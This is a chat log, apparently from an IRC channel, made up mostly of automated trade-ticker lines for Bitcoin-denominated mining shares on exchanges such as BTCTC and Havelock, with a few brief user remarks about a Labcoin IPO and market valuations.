[ASICMINER-PT] 1 @ 4.375 BTC [+] Jul 31 08:52:56 [BTCTC] [ASICMINER-PT] 8 @ 4.375 = 35 BTC [+] Jul 31 08:52:58 [BTCTC] [ASICMINER-PT] 1 @ 4.387 BTC [+] Jul 31 08:53:02 [BTCTC] [ASICMINER-PT] 20 @ 4.388 = 87.76 BTC [+] Jul 31 08:55:31 [BTCTC] [ACTIVEMINING] 25 @ 0.005401 = 0.135 BTC [-] Jul 31 08:55:34 [BTCTC] [ACTIVEMINING] 800 @ 0.0054 = 4.32 BTC [-] Jul 31 08:55:37 [BTCTC] [ACTIVEMINING] 1000 @ 0.00535 = 5.35 BTC [-] Jul 31 08:55:42 [BTCTC] [ACTIVEMINING] 15 @ 0.005206 = 0.0781 BTC [-] Jul 31 08:55:45 [BTCTC] [ACTIVEMINING] 2000 @ 0.005204 = 10.408 BTC [-] Jul 31 08:55:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005202 = 0.2601 BTC [-] Jul 31 08:55:50 [BTCTC] [ACTIVEMINING] 500 @ 0.005101 = 2.5505 BTC [-] Jul 31 08:56:01 [BTCTC] [ACTIVEMINING] 1711 @ 0.00501 = 8.5721 BTC [-] Jul 31 08:57:51 [BTCTC] [ACTIVEMINING] 50 @ 0.005201 = 0.2601 BTC [+] Jul 31 08:57:53 [BTCTC] [ACTIVEMINING] 1 @ 0.0052 BTC [-] Jul 31 08:57:55 [BTCTC] [ACTIVEMINING] 1 @ 0.005012 BTC [-] Jul 31 08:57:57 [BTCTC] [ACTIVEMINING] 299 @ 0.005011 = 1.4983 BTC [-] Jul 31 08:57:59 [BTCTC] [ACTIVEMINING] 6 @ 0.005011 = 0.0301 BTC [-] Jul 31 08:58:01 [BTCTC] [ACTIVEMINING] 799 @ 0.00501 = 4.003 BTC [-] Jul 31 08:58:02 [BTCTC] [ACTIVEMINING] 1 @ 0.005005 BTC [-] Jul 31 08:58:04 [BTCTC] [ACTIVEMINING] 193 @ 0.005 = 0.965 BTC [-] Jul 31 08:59:03 [BTCTC] [TAT.MINIGAME] 1 @ 0.000301 BTC [-] Jul 31 08:59:05 [BTCTC] [TAT.MINIGAME] 2707 @ 0.0002765 = 0.7485 BTC [-] Jul 31 08:59:08 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002764 = 0.2764 BTC [-] Jul 31 08:59:10 [BTCTC] [TAT.MINIGAME] 2000 @ 0.0002762 = 0.5524 BTC [-] Jul 31 08:59:15 [BTCTC] [TAT.MINIGAME] 11 @ 0.000276 = 0.003 BTC [-] Jul 31 08:59:17 [BTCTC] [TAT.MINIGAME] 1701 @ 0.0002752 = 0.4681 BTC [-] Jul 31 08:59:19 [BTCTC] [TAT.MINIGAME] 3071 @ 0.000275 = 0.8445 BTC [-] Jul 31 09:00:46 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 31 09:00:53 [BTCTC] [ASICMINER-PT] 6 @ 4.273 = 25.638 BTC [-] Jul 31 09:00:54 [BTCTC] [ACTIVEMINING] 100 @ 0.005 = 0.5 BTC [-] Jul 31 09:00:57 [BTCTC] [ASICMINER-PT] 10 @ 4.272 = 42.72 BTC [-] Jul 31 09:00:59 [BTCTC] [ASICMINER-PT] 1 @ 4.269 BTC [-] Jul 31 09:01:02 [BTCTC] [ASICMINER-PT] 1 @ 4.268 BTC [-] Jul 31 09:01:05 [BTCTC] [ASICMINER-PT] 1 @ 4.267 BTC [-] Jul 31 09:01:19 [BTCTC] [ASICMINER-PT] 2 @ 4.262 = 8.524 BTC [-] Jul 31 09:01:20 [BTCTC] [ACTIVEMINING] 7 @ 0.005 = 0.035 BTC [-] Jul 31 09:01:22 [BTCTC] [ACTIVEMINING] 25 @ 0.004999 = 0.125 BTC [-] Jul 31 09:01:23 [BTCTC] [ASICMINER-PT] 1 @ 4.261 BTC [-] Jul 31 09:01:24 [BTCTC] [ACTIVEMINING] 2000 @ 0.004999 = 9.998 BTC [-] Jul 31 09:01:26 [BTCTC] [ASICMINER-PT] 10 @ 4.26 = 42.6 BTC [-] Jul 31 09:01:35 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 31 09:03:12 [BTCTC] [ASICMINER-PT] 8 @ 4.25 = 34 BTC [-] Jul 31 09:03:28 [BTCTC] [ACTIVEMINING] 1000 @ 0.00491 = 4.91 BTC [-] Jul 31 09:04:29 [BTCTC] [ACTIVEMINING] 1000 @ 0.0049 = 4.9 BTC [-] Jul 31 09:04:37 [BTCTC] [ACTIVEMINING] 2000 @ 0.0049 = 9.8 BTC [-] Jul 31 09:04:40 [BTCTC] [ACTIVEMINING] 40 @ 0.0049 = 0.196 BTC [-] Jul 31 09:04:56 [BTCTC] [ACTIVEMINING] 1 @ 0.004899 BTC [-] Jul 31 09:05:31 [BTCTC] [ACTIVEMINING] 25 @ 0.0049 = 0.1225 BTC [+] Jul 31 09:05:59 [BTCTC] [ASICMINER-PT] 1 @ 4.359 BTC [+] Jul 31 09:06:18 [BTCTC] [ACTIVEMINING] 5 @ 0.0047 = 0.0235 BTC [-] Jul 31 09:07:12 [BTCTC] [ACTIVEMINING] 1 @ 0.004999 BTC [+] Jul 31 09:07:16 [BTCTC] [ACTIVEMINING] 44 @ 0.004701 = 0.2068 BTC [-] Jul 31 09:07:20 [BTCTC] [ACTIVEMINING] 25 @ 0.004999 = 0.125 BTC [+] Jul 31 09:07:24 [BTCTC] [ACTIVEMINING] 1585 @ 0.004701 = 7.4511 BTC [-] Jul 31 09:07:28 [BTCTC] [ACTIVEMINING] 270 @ 0.004701 = 1.2693 BTC [-] Jul 31 09:07:53 [BTCTC] [ACTIVEMINING] 25 @ 0.004998 = 0.125 BTC [+] Jul 31 09:07:55 [BTCTC] [ACTIVEMINING] 50 @ 0.004998 = 0.2499 BTC [+] Jul 31 09:07:57 [BTCTC] [ACTIVEMINING] 125 @ 0.004999 = 0.6249 BTC [+] Jul 31 09:08:36 [BTCTC] [COGNITIVE] 1 @ 0.508 BTC [+] Jul 31 09:08:52 [BTCTC] [COGNITIVE] 1 @ 0.5078 BTC [-] Jul 31 09:09:23 [BTCTC] [COGNITIVE] 1 @ 0.5077 BTC [-] Jul 31 09:09:26 [BTCTC] [ACTIVEMINING] 25 @ 0.004702 = 0.1176 BTC [-] Jul 31 09:09:31 [BTCTC] [ACTIVEMINING] 100 @ 0.0076 = 0.76 BTC [+] Jul 31 09:09:33 [BTCTC] [ACTIVEMINING] 25 @ 0.004996 = 0.1249 BTC [-] Jul 31 09:09:35 [BTCTC] [ACTIVEMINING] 675 @ 0.004997 = 3.373 BTC [+] Jul 31 09:10:21 [BTCTC] [ACTIVEMINING] 25 @ 0.004703 = 0.1176 BTC [-] Jul 31 09:10:56 [BTCTC] [ACTIVEMINING] 700 @ 0.0076 = 5.32 BTC [+] Jul 31 09:11:03 [BTCTC] [ACTIVEMINING] 25 @ 0.004996 = 0.1249 BTC [-] Jul 31 09:11:21 [BTCTC] [ACTIVEMINING] 25 @ 0.004996 = 0.1249 BTC [-] Jul 31 09:11:23 [BTCTC] [ACTIVEMINING] 337 @ 0.004997 = 1.684 BTC [+] Jul 31 09:11:25 [BTCTC] [ACTIVEMINING] 2000 @ 0.0055 = 11 BTC [+] Jul 31 09:11:27 [BTCTC] [ACTIVEMINING] 1 @ 0.005564 BTC [+] Jul 31 09:11:28 [BTCTC] [ACTIVEMINING] 2222 @ 0.005795 = 12.8765 BTC [+] Jul 31 09:11:29 [BTCTC] [ACTIVEMINING] 1111 @ 0.005797 = 6.4405 BTC [+] Jul 31 09:12:41 [BTCTC] [ACTIVEMINING] 1 @ 0.005997 BTC [+] Jul 31 09:13:09 [BTCTC] [ACTIVEMINING] 1 @ 0.004997 BTC [-] Jul 31 09:13:26 [BTCTC] [ACTIVEMINING] 25 @ 0.005995 = 0.1499 BTC [+] Jul 31 09:13:28 [BTCTC] [ACTIVEMINING] 5 @ 0.005996 = 0.03 BTC [+] Jul 31 09:14:14 [BTCTC] [ACTIVEMINING] 25 @ 0.005997 = 0.1499 BTC [+] Jul 31 09:14:57 [BTCTC] [ACTIVEMINING] 25 @ 0.005499 = 0.1375 BTC [-] Jul 31 09:14:59 [BTCTC] [ACTIVEMINING] 25 @ 0.0055 = 0.1375 BTC [+] Jul 31 09:15:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005998 = 0.2999 BTC [+] Jul 31 09:17:47 [BTCTC] [ACTIVEMINING] 831 @ 0.006199 = 5.1514 BTC [+] Jul 31 09:18:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.04319 BTC [+] Jul 31 09:21:39 [BTCTC] [ACTIVEMINING] 43 @ 0.006 = 0.258 BTC [-] Jul 31 09:23:44 [BTCTC] [ACTIVEMINING] 25 @ 0.005215 = 0.1304 BTC [-] Jul 31 09:23:46 [BTCTC] [ACTIVEMINING] 957 @ 0.005214 = 4.9898 BTC [-] Jul 31 09:23:48 [BTCTC] [ACTIVEMINING] 50 @ 0.005211 = 0.2606 BTC [-] Jul 31 09:23:50 [BTCTC] [ACTIVEMINING] 1000 @ 0.00521 = 5.21 BTC [-] Jul 31 09:23:52 [BTCTC] [ACTIVEMINING] 1 @ 0.005208 BTC [-] Jul 31 09:23:54 [BTCTC] [ACTIVEMINING] 200 @ 0.0052 = 1.04 BTC [-] Jul 31 09:23:56 [BTCTC] [ACTIVEMINING] 5 @ 0.005 = 0.025 BTC [-] Jul 31 09:23:58 [BTCTC] [ACTIVEMINING] 1 @ 0.004708 BTC [-] Jul 31 09:25:15 [BTCTC] [ACTIVEMINING] 2700 @ 0.0076 = 20.52 BTC [+] Jul 31 09:25:32 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jul 31 09:26:00 [BTCTC] [BTC-BOND] 47 @ 0.009981 = 0.4691 BTC [-] Jul 31 09:26:29 [BTCTC] [ACTIVEMINING] 1499 @ 0.0075 = 11.2425 BTC [-] Jul 31 09:26:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005001 = 0.125 BTC [-] Jul 31 09:27:35 [BTCTC] [ACTIVEMINING] 25 @ 0.005001 = 0.125 BTC [-] Jul 31 09:27:44 [BTCTC] [ACTIVEMINING] 4975 @ 0.005 = 24.875 BTC [-] Jul 31 09:27:53 [BTCTC] [ACTIVEMINING] 25 @ 0.005 = 0.125 BTC [-] Jul 31 09:28:04 [BTCTC] [ACTIVEMINING] 5 @ 0.004821 = 0.0241 BTC [-] Jul 31 09:28:19 [BTCTC] [ACTIVEMINING] 6 @ 0.004801 = 0.0288 BTC [-] Jul 31 09:28:21 [BTCTC] [ACTIVEMINING] 1 @ 0.004799 BTC [-] Jul 31 09:28:23 [BTCTC] [ACTIVEMINING] 500 @ 0.00471 = 2.355 BTC [-] Jul 31 09:28:25 [BTCTC] [ACTIVEMINING] 243 @ 0.004704 = 1.1431 BTC [-] Jul 31 09:29:18 [BTCTC] [S.MPOE-PT] 2 @ 0.0008327 = 0.0017 BTC [-] Jul 31 09:29:23 [BTCTC] [ACTIVEMINING] 25 @ 0.00482 = 0.1205 BTC [+] Jul 31 09:29:28 [BTCTC] [ACTIVEMINING] 75 @ 0.004821 = 0.3616 BTC [+] Jul 31 09:29:33 [BTCTC] [TAT.MINIGAME] 650 @ 0.0002805 = 0.1823 BTC [+] Jul 31 09:29:35 [BTCTC] [ACTIVEMINING] 17 @ 0.005992 = 0.1019 BTC [+] Jul 31 09:29:39 [BTCTC] [ACTIVEMINING] 50 @ 0.005993 = 0.2997 BTC [+] Jul 31 09:30:00 [BTCTC] [TAT.MINIGAME] 6 @ 0.0002805 = 0.0017 BTC [+] Jul 31 09:30:41 [BTCTC] [TAT.MINIGAME] 2248 @ 0.00028 = 0.6294 BTC [-] Jul 31 09:31:00 [BTCTC] [ACTIVEMINING] 167 @ 0.0076 = 1.2692 BTC [+] Jul 31 09:31:45 [HAVELOCK] [AM1] 1 @ 4.321 BTC [-] Jul 31 09:31:51 [BTCTC] [ACTIVEMINING] 1 @ 0.004771 BTC [-] Jul 31 09:31:53 [HAVELOCK] [AM1] 1 @ 4.32 BTC [-] Jul 31 09:32:37 [BTCTC] [ACTIVEMINING] 100 @ 0.0083 = 0.83 BTC [+] Jul 31 09:32:42 [BTCTC] [ACTIVEMINING] 100 @ 0.0083 = 0.83 BTC [+] Jul 31 09:32:48 [BTCTC] [ACTIVEMINING] 47 @ 0.0083 = 0.3901 BTC [+] Jul 31 09:33:29 [BTCTC] [TAT.MINIGAME] 490 @ 0.00028 = 0.1372 BTC [-] Jul 31 09:33:51 [BTCTC] [ACTIVEMINING] 53 @ 0.0083 = 0.4399 BTC [+] Jul 31 09:35:22 [HAVELOCK] [AM100] 3 @ 0.04 = 0.12 BTC [-] Jul 31 09:35:27 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 31 09:35:32 [HAVELOCK] [AM100] 2 @ 0.0397 = 0.0794 BTC [-] Jul 31 09:35:37 [HAVELOCK] [AM100] 1 @ 0.0395 BTC [-] Jul 31 09:35:42 [HAVELOCK] [AM100] 1 @ 0.0393 BTC [-] Jul 31 09:35:46 [HAVELOCK] [AM100] 1 @ 0.0391 BTC [-] Jul 31 09:35:52 [HAVELOCK] [AM100] 3 @ 0.03906 = 0.1172 BTC [-] Jul 31 09:35:57 [HAVELOCK] [AM100] 1 @ 0.0389 BTC [-] Jul 31 09:36:01 [HAVELOCK] [AM100] 21 @ 0.0387101 = 0.8129 BTC [-] Jul 31 09:36:06 [HAVELOCK] [AM100] 10 @ 0.03871 = 0.3871 BTC [-] Jul 31 09:36:12 [HAVELOCK] [AM100] 25 @ 0.03870009 = 0.9675 BTC [-] Jul 31 09:36:17 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [-] Jul 31 09:36:22 [HAVELOCK] [AM100] 80 @ 0.03852 = 3.0816 BTC [-] Jul 31 09:36:30 [HAVELOCK] [AM100] 250 @ 0.03851 = 9.6275 BTC [-] Jul 31 09:36:50 [BTCTC] [ACTIVEMINING] 10 @ 0.0083 = 0.083 BTC [+] Jul 31 09:39:25 [BTCTC] [TAT.MINIGAME] 3071 @ 0.00028 = 0.8599 BTC [-] Jul 31 09:39:27 [BTCTC] [BITVPS] 192 @ 0.001801 = 0.3458 BTC [-] Jul 31 09:39:28 [BTCTC] [BITVPS] 1 @ 0.0018 BTC [-] Jul 31 09:41:17 [BTCTC] [ACTIVEMINING] 25 @ 0.005397 = 0.1349 BTC [-] Jul 31 09:41:19 [BTCTC] [ACTIVEMINING] 756 @ 0.005398 = 4.0809 BTC [+] Jul 31 09:41:21 [BTCTC] [ACTIVEMINING] 3000 @ 0.0054 = 16.2 BTC [+] Jul 31 09:41:22 [BTCTC] [ACTIVEMINING] 8 @ 0.005584 = 0.0447 BTC [+] Jul 31 09:41:24 [BTCTC] [ACTIVEMINING] 50 @ 0.005585 = 0.2793 BTC [+] Jul 31 09:41:25 [BTCTC] [ACTIVEMINING] 239 @ 0.005595 = 1.3372 BTC [+] Jul 31 09:41:27 [BTCTC] [ACTIVEMINING] 1 @ 0.005596 BTC [+] Jul 31 09:41:28 [BTCTC] [ACTIVEMINING] 296 @ 0.005597 = 1.6567 BTC [+] Jul 31 09:42:33 [BTCTC] [ACTIVEMINING] 25 @ 0.005594 = 0.1399 BTC [-] Jul 31 09:45:07 [HAVELOCK] [HIM] 11 @ 0.16 = 1.76 BTC [-] Jul 31 09:45:48 [BTCTC] [BASIC-MINING] 2 @ 0.4091 = 0.8182 BTC [-] Jul 31 09:45:59 [BTCTC] [BASIC-MINING] 3 @ 0.4091 = 1.2273 BTC [-] Jul 31 09:47:47 [BTCTC] [ACTIVEMINING] 1 @ 0.005985 BTC [+] Jul 31 09:49:21 [BTCTC] [ACTIVEMINING] 330 @ 0.005969 = 1.9698 BTC [-] Jul 31 09:50:38 [BTCTC] [ACTIVEMINING] 1 @ 0.0059 BTC [-] Jul 31 09:52:21 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 31 09:55:14 [HAVELOCK] [HIM] 1 @ 0.144 BTC [-] Jul 31 09:55:20 [HAVELOCK] [HIM] 1 @ 0.14300001 BTC [-] Jul 31 09:55:29 [HAVELOCK] [HIM] 5 @ 0.14200042 = 0.71 BTC [-] Jul 31 09:55:37 [HAVELOCK] [HIM] 10 @ 0.142 = 1.42 BTC [-] Jul 31 09:55:58 [HAVELOCK] [HIM] 1 @ 0.141 BTC [-] Jul 31 09:57:04 [BTCTC] [ACTIVEMINING] 4 @ 0.005785 = 0.0231 BTC [-] Jul 31 09:57:08 [BTCTC] [TAT.MINIGAME] 5314 @ 0.00028 = 1.4879 BTC [-] Jul 31 09:57:29 [BTCTC] [MININGCO.ETF] 2 @ 1.602 = 3.204 BTC [-] Jul 31 09:57:45 [BTCTC] [ACTIVEMINING] 4 @ 0.005795 = 0.0232 BTC [+] Jul 31 09:57:50 [BTCTC] [ASICMINER-PT] 4 @ 4.232 = 16.928 BTC [-] Jul 31 09:57:59 [HAVELOCK] [SMG] 978 @ 0.00025405 = 0.2485 BTC [-] Jul 31 10:01:27 [BTCTC] [ASICMINER-PT] 3 @ 4.232 = 12.696 BTC [-] Jul 31 10:01:30 [BTCTC] [ACTIVEMINING] 330 @ 0.005892 = 1.9444 BTC [+] Jul 31 10:01:35 [BTCTC] [ACTIVEMINING] 50 @ 0.005893 = 0.2947 BTC [+] Jul 31 10:01:51 [BTCTC] [ACTIVEMINING] 25 @ 0.005716 = 0.1429 BTC [-] Jul 31 10:01:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005715 = 0.1429 BTC [-] Jul 31 10:01:54 [BTCTC] [ACTIVEMINING] 50 @ 0.005714 = 0.2857 BTC [-] Jul 31 10:02:30 [BTCTC] [ACTIVEMINING] 25 @ 0.005892 = 0.1473 BTC [+] Jul 31 10:02:55 [BTCTC] [ACTIVEMINING] 5 @ 0.005893 = 0.0295 BTC [+] Jul 31 10:03:23 [BTCTC] [ACTIVEMINING] 38 @ 0.005894 = 0.224 BTC [+] Jul 31 10:03:35 [BTCTC] [ACTIVEMINING] 12 @ 0.005708 = 0.0685 BTC [-] Jul 31 10:03:37 [BTCTC] [ACTIVEMINING] 300 @ 0.0053 = 1.59 BTC [-] Jul 31 10:03:39 [BTCTC] [ACTIVEMINING] 318 @ 0.005214 = 1.6581 BTC [-] Jul 31 10:03:41 [BTCTC] [ACTIVEMINING] 22 @ 0.005151 = 0.1133 BTC [-] Jul 31 10:03:42 [BTCTC] [ACTIVEMINING] 45 @ 0.00515 = 0.2318 BTC [-] Jul 31 10:03:45 [BTCTC] [ACTIVEMINING] 44 @ 0.005101 = 0.2244 BTC [-] Jul 31 10:03:46 [BTCTC] [ACTIVEMINING] 88 @ 0.0051 = 0.4488 BTC [-] Jul 31 10:03:49 [BTCTC] [ACTIVEMINING] 1045 @ 0.005005 = 5.2302 BTC [-] Jul 31 10:03:51 [BTCTC] [ACTIVEMINING] 500 @ 0.005004 = 2.502 BTC [-] Jul 31 10:04:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005302 = 0.1326 BTC [+] Jul 31 10:04:54 [BTCTC] [ACTIVEMINING] 175 @ 0.005301 = 0.9277 BTC [-] Jul 31 10:05:32 everyones getting out of amc, rushing into labcoin Jul 31 10:05:58 [BTCTC] [ASICMINER-PT] 1 @ 4.232 BTC [-] Jul 31 10:06:01 [BTCTC] [ASICMINER-PT] 4 @ 4.231 = 16.924 BTC [-] Jul 31 10:06:05 [BTCTC] [ASICMINER-PT] 1 @ 4.23 BTC [-] Jul 31 10:06:47 [BTCTC] [BTC-TRADING-PT] 18 @ 0.81 = 14.58 BTC [-] Jul 31 10:08:10 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 31 10:08:27 [BTCTC] [ACTIVEMINING] 25 @ 0.005887 = 0.1472 BTC [+] Jul 31 10:08:28 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 31 10:08:29 [BTCTC] [ACTIVEMINING] 175 @ 0.005888 = 1.0304 BTC [+] Jul 31 10:08:31 [BTCTC] [ACTIVEMINING] 50 @ 0.005891 = 0.2946 BTC [+] Jul 31 10:08:32 [BTCTC] [ASICMINER-PT] 1 @ 4.205 BTC [-] Jul 31 10:08:37 [BTCTC] [ACTIVEMINING] 5 @ 0.005895 = 0.0295 BTC [+] Jul 31 10:08:40 [BTCTC] [ACTIVEMINING] 8 @ 0.005899 = 0.0472 BTC [+] Jul 31 10:08:41 [BTCTC] [ASICMINER-PT] 1 @ 4.202 BTC [-] Jul 31 10:08:43 [BTCTC] [ACTIVEMINING] 34 @ 0.0059 = 0.2006 BTC [+] Jul 31 10:08:44 [BTCTC] [ACTIVEMINING] 193 @ 0.0059 = 1.1387 BTC [+] Jul 31 10:08:45 [BTCTC] [ASICMINER-PT] 1 @ 4.202 BTC [-] Jul 31 10:12:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 31 10:12:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.04214 = 0.1686 BTC [-] Jul 31 10:12:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.0421 = 0.1263 BTC [-] Jul 31 10:12:53 [BTCTC] [TAT.ASICMINER] 54 @ 0.04201 = 2.2685 BTC [-] Jul 31 10:13:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.042 = 0.126 BTC [-] Jul 31 10:13:16 [BTCTC] [TAT.ASICMINER] 7 @ 0.042 = 0.294 BTC [-] Jul 31 10:13:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.042 = 0.42 BTC [-] Jul 31 10:13:33 [BTCTC] [TAT.ASICMINER] 28 @ 0.042 = 1.176 BTC [-] Jul 31 10:13:48 [BTCTC] [ACTIVEMINING] 1 @ 0.005899 BTC [-] Jul 31 10:16:49 [MPEX] [S.MPOE] 4296 @ 0.00080547 = 3.4603 BTC [-] Jul 31 10:16:51 [MPEX] [S.MPOE] 7304 @ 0.00080315 = 5.8662 BTC [-] Jul 31 10:18:45 [MPEX] [S.MG] 15000 @ 0.0002675 = 4.0125 BTC [+] Jul 31 10:18:53 [BTCTC] [TAT.ASICMINER] 17 @ 0.042 = 0.714 BTC [-] Jul 31 10:18:55 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Jul 31 10:19:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.042 = 0.84 BTC [-] Jul 31 10:19:17 [BTCTC] [ASICMINER-PT] 1 @ 4.201 BTC [-] Jul 31 10:19:22 [BTCTC] [TAT.ASICMINER] 23 @ 0.042 = 0.966 BTC [-] Jul 31 10:19:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.042 BTC [-] Jul 31 10:19:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.042 = 0.21 BTC [-] Jul 31 10:19:44 [BTCTC] [ASICMINER-PT] 6 @ 4.45 = 26.7 BTC [+] Jul 31 10:20:40 [BTCTC] [ACTIVEMINING] 5 @ 0.005898 = 0.0295 BTC [-] Jul 31 10:20:42 [BTCTC] [ACTIVEMINING] 11 @ 0.005899 = 0.0649 BTC [+] Jul 31 10:20:44 [BTCTC] [ACTIVEMINING] 47 @ 0.005974 = 0.2808 BTC [+] Jul 31 10:20:45 [BTCTC] [ACTIVEMINING] 15 @ 0.005975 = 0.0896 BTC [+] Jul 31 10:20:46 [BTCTC] [ACTIVEMINING] 80 @ 0.005977 = 0.4782 BTC [+] Jul 31 10:20:48 [BTCTC] [ACTIVEMINING] 161 @ 0.00599 = 0.9644 BTC [+] Jul 31 10:22:14 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 31 10:22:56 [BTCTC] [ASICMINER-PT] 24 @ 4.2 = 100.8 BTC [-] Jul 31 10:22:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.0419 = 0.838 BTC [-] Jul 31 10:23:09 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [-] Jul 31 10:23:14 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 31 10:23:32 [BTCTC] [ASICMINER-PT] 3 @ 4.2 = 12.6 BTC [-] Jul 31 10:23:50 [BTCTC] [ASICMINER-PT] 5 @ 4.2 = 21 BTC [-] Jul 31 10:24:36 [BTCTC] [ACTIVEMINING] 932 @ 0.005352 = 4.9881 BTC [-] Jul 31 10:24:37 [BTCTC] [ACTIVEMINING] 10 @ 0.00535 = 0.0535 BTC [-] Jul 31 10:24:39 [BTCTC] [ACTIVEMINING] 50 @ 0.005335 = 0.2668 BTC [-] Jul 31 10:24:41 [BTCTC] [ACTIVEMINING] 15 @ 0.005333 = 0.08 BTC [-] Jul 31 10:24:43 [BTCTC] [ACTIVEMINING] 6 @ 0.005314 = 0.0319 BTC [-] Jul 31 10:24:45 [BTCTC] [ACTIVEMINING] 3 @ 0.00531 = 0.0159 BTC [-] Jul 31 10:24:47 [BTCTC] [ACTIVEMINING] 4 @ 0.00522 = 0.0209 BTC [-] Jul 31 10:24:49 [BTCTC] [ACTIVEMINING] 500 @ 0.005006 = 2.503 BTC [-] Jul 31 10:24:51 [BTCTC] [ACTIVEMINING] 14 @ 0.0049 = 0.0686 BTC [-] Jul 31 10:24:53 [BTCTC] [ACTIVEMINING] 1000 @ 0.0049 = 4.9 BTC [-] Jul 31 10:24:55 [BTCTC] [ACTIVEMINING] 25 @ 0.004802 = 0.1201 BTC [-] Jul 31 10:24:56 [BTCTC] [ACTIVEMINING] 50 @ 0.004801 = 0.2401 BTC [-] Jul 31 10:24:59 [BTCTC] [ACTIVEMINING] 850 @ 0.00478 = 4.063 BTC [-] Jul 31 10:25:13 [HAVELOCK] [AM1] 2 @ 4.32 = 8.64 BTC [-] Jul 31 10:25:38 [HAVELOCK] [AM100] 200 @ 0.04 = 8 BTC [+] Jul 31 10:25:52 [HAVELOCK] [AM100] 10 @ 0.04 = 0.4 BTC [+] Jul 31 10:26:01 [HAVELOCK] [AM100] 5 @ 0.04 = 0.2 BTC [+] Jul 31 10:26:41 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [+] Jul 31 10:27:24 [BTCTC] [ASICMINER-PT] 1 @ 4.201 BTC [-] Jul 31 10:27:28 [BTCTC] [ASICMINER-PT] 12 @ 4.2 = 50.4 BTC [-] Jul 31 10:28:47 [BTCTC] [BITVPS] 100 @ 0.00179 = 0.179 BTC [-] Jul 31 10:28:48 [BTCTC] [ASICMINER-PT] 9 @ 4.2 = 37.8 BTC [-] Jul 31 10:29:37 [BTCTC] [ACTIVEMINING] 1 @ 0.004771 BTC [-] Jul 31 10:30:08 [HAVELOCK] [HIM] 2 @ 0.131 = 0.262 BTC [-] Jul 31 10:30:30 [HAVELOCK] [HIM] 80 @ 0.13000101 = 10.4001 BTC [-] Jul 31 10:31:13 [BTCTC] [ASICMINER-PT] 1 @ 4.185 BTC [-] Jul 31 10:31:56 [BTCTC] [ASICMINER-PT] 4 @ 4.171 = 16.684 BTC [-] Jul 31 10:32:25 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [-] Jul 31 10:32:38 [BTCTC] [ASICMINER-PT] 2 @ 4.159 = 8.318 BTC [-] Jul 31 10:32:43 [HAVELOCK] [AM1] 13 @ 4.32 = 56.16 BTC [-] Jul 31 10:32:52 [BTCTC] [ASICMINER-PT] 10 @ 4.15 = 41.5 BTC [-] Jul 31 10:33:19 [BTCTC] [ASICMINER-PT] 1 @ 4.132 BTC [-] Jul 31 10:33:28 [BTCTC] [ACTIVEMINING] 1 @ 0.0083 BTC [+] Jul 31 10:33:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.04299 BTC [+] Jul 31 10:33:31 [BTCTC] [ASICMINER-PT] 2 @ 4.122 = 8.244 BTC [-] Jul 31 10:33:41 [BTCTC] [ACTIVEMINING] 25 @ 0.004805 = 0.1201 BTC [-] Jul 31 10:33:46 [BTCTC] [ASICMINER-PT] 11 @ 4.121 = 45.331 BTC [-] Jul 31 10:33:53 [BTCTC] [ACTIVEMINING] 1 @ 0.004804 BTC [-] Jul 31 10:33:59 [BTCTC] [ASICMINER-PT] 5 @ 4.12 = 20.6 BTC [-] Jul 31 10:34:01 [BTCTC] [ACTIVEMINING] 50 @ 0.004802 = 0.2401 BTC [-] Jul 31 10:34:14 [BTCTC] [ACTIVEMINING] 524 @ 0.0048 = 2.5152 BTC [-] Jul 31 10:34:47 lol. Jul 31 10:34:58 any more people looking for a "graet opportunity" ? Jul 31 10:35:18 mp Jul 31 10:35:33 i think btcgarden are valuing themselves at around 160 million usd Jul 31 10:35:36 the next is labcoin Jul 31 10:35:38 ! Jul 31 10:35:53 according to my calcs Jul 31 10:35:57 [BTCTC] [ACTIVEMINING] 1 @ 0.0083 BTC [+] Jul 31 10:36:18 labcoin around 1 million Jul 31 10:36:41 already placed my orders for labcoin, looks like it's gonna fill quick Jul 31 10:36:44 labcoin's ipo is > 60 % filled, trading hasn't started yet.. Jul 31 10:37:21 [BTCTC] [ASICMINER-PT] 2 @ 4.126 = 8.252 BTC [+] Jul 31 10:37:27 sec is going to have a field day Jul 31 10:37:29 :/ Jul 31 10:38:08 this i sabsurd Jul 31 10:38:08 burnside: are you here? Jul 31 10:38:38 or ThickAsThieves? or any other btct issuer? Jul 31 10:38:49 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [+] Jul 31 10:38:49 nope Jul 31 10:38:50 https://bitcointalk.org/index.php?topic=263445.msg2837456#msg2837456 Jul 31 10:38:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.04299 = 0.2579 BTC [+] Jul 31 10:38:53 [BTCTC] [ACTIVEMINING] 2 @ 0.0083 = 0.0166 BTC [+] Jul 31 10:38:56 [LABCOIN] IPO 